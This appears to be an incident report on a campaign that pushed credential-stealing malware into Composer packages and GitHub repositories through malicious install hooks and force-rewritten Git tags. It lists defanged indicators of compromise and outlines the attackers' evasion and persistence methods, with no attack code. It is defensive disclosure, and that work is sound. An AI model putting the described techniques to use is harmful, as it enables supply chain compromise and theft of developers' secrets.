Full Report
Researchers identified multiple coordinated software supply chain attacks targeting Composer/Packagist packages and upstream GitHub repositories. The activity involved malicious postinstall hooks, compromised Git tags, CI/CD payload execution, and credential-stealing malware d...
Analysis Summary
# Incident Report: Supply Chain Campaign Targeting Composer and GitHub Repositories
## Executive Summary
In May 2024, researchers identified a coordinated supply chain attack targeting over 700 GitHub repositories and multiple Packagist (Composer) packages. The campaign utilized malicious post-install hooks and compromised Git tags to distribute credential-stealing malware designed to exfiltrate secrets from developer environments and CI/CD pipelines. The attack was successfully mitigated through the identification of malicious commits and the removal of affected packages/tags.
## Incident Details
- **Discovery Date:** May 2024
- **Incident Date:** May 2024
- **Affected Organization:** Multiple (including Laravel-Lang GitHub organization)
- **Sector:** Software Development / Open Source Ecosystem
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** May 2024
- **Vector:** Supply Chain Compromise / Unauthorized GitHub Access
- **Details:** Attackers gained push access to specific GitHub organizations (notably Laravel-Lang) and utilized malicious "postinstall" hooks in npm packages to compromise environments using both PHP and JavaScript.
### Lateral Movement
- **Mechanism:** The malware targeted developer machines and CI/CD environments. Once a package was installed or a workflow triggered, the malware attempted to harvest credentials (secrets/environment variables) to potentially facilitate further access to linked cloud or deployment environments.
### Data Exfiltration/Impact
- **Details:** The primary impact was the theft of environment variables and CI/CD secrets. The malware exfiltrated gathered data to attacker-controlled infrastructure.
### Detection & Response
- **Detection:** Identified by security researchers (Socket and StepSecurity) through behavioral analysis of package updates and repository changes.
- **Response:** Notification of affected maintainers, removal of compromised Git tags, and publication of Indicators of Compromise (IoCs) to alert the developer community.
## Attack Methodology
- **Initial Access:** Compromised developer credentials or unauthorized GitHub push access; typosquatted domains.
- **Persistence:** Implementation of orphaned processes to continue execution after the main installation process ended.
- **Defense Evasion:** Use of hidden files (e.g., `/tmp/.sshd`), force-rewriting Git history/tags, and rapid self-deletion of artifacts from disk within seconds.
- **Credential Access:** Automated extraction of environment variables and repository secrets from GitHub Actions.
- **Discovery:** Automated scanning of local file systems for configuration files and secrets.
- **Impact:** Compromise of downstream software integrity and potential secondary breaches via stolen credentials.
## Impact Assessment
- **Financial:** Indirect costs related to incident response, secret rotation, and audit requirements for affected organizations.
- **Data Breach:** Exposure of sensitive CI/CD secrets, API keys, and private environment variables.
- **Operational:** Disruption of development workflows and the necessity to rebuild/verify hundreds of compromised repositories.
- **Reputational:** Erosion of trust in popular open-source utility packages within the Laravel and PHP ecosystems.
## Indicators of Compromise (IoCs)
- **Network Indicators:**
- Communications with typosquatted domains (e.g., hxxps[://]laravel-lang[.]net - *Note: Genuine site is .com or .org*)
- Traffic to unauthorized GitHub-hosted binaries.
- **File Indicators:**
- Existence of `/tmp/.sshd` (malicious binary).
- Modification of `package.json` to include suspicious `postinstall` hooks.
- Addition of `src/helpers.php` to `autoload.files` in `composer.json`.
- **Behavioral Indicators:**
- Deployment of orphaned background processes during package installation.
- Systematic force-pushing/rewriting of all Git tags within a repository.
## Response Actions
- **Containment:** Affected repositories were identified and malicious tags were removed or reverted.
- **Eradication:** Attackers' access to the Laravel-Lang organization was revoked; malicious payloads hosted on GitHub were taken down.
- **Recovery:** Development teams rotated leaked secrets and validated the integrity of their production CI/CD pipelines.
## Lessons Learned
- **Cross-Ecosystem Risks:** Security audits often focus on a project's primary language (e.g., PHP/Composer) while ignoring secondary ecosystems (e.g., JS/npm) present in the same repository.
- **Tag Volatility:** Git tags are not immutable. Force-pushing tags is a highly effective way to distribute malware to users who lock versions by tag name.
- **CI/CD Visibility:** Lack of monitoring for outbound network traffic in CI/CD runners allows for silent secret exfiltration.
## Recommendations
- **Immutable Dependencies:** Use hash-based locking (e.g., `composer.lock` or `package-lock.json`) rather than relying solely on tags.
- **Secret Management:** Implement Just-In-Time (JIT) secrets or OIDC for CI/CD workflows to minimize the lifespan of exfiltrated credentials.
- **Hook Restrictions:** Run package managers with flags that disable scripts (e.g., `npm install --ignore-scripts`) unless absolutely necessary.
- **Repository Monitoring:** Enable branch protection and monitor for "Force Push" events on production branches and tags.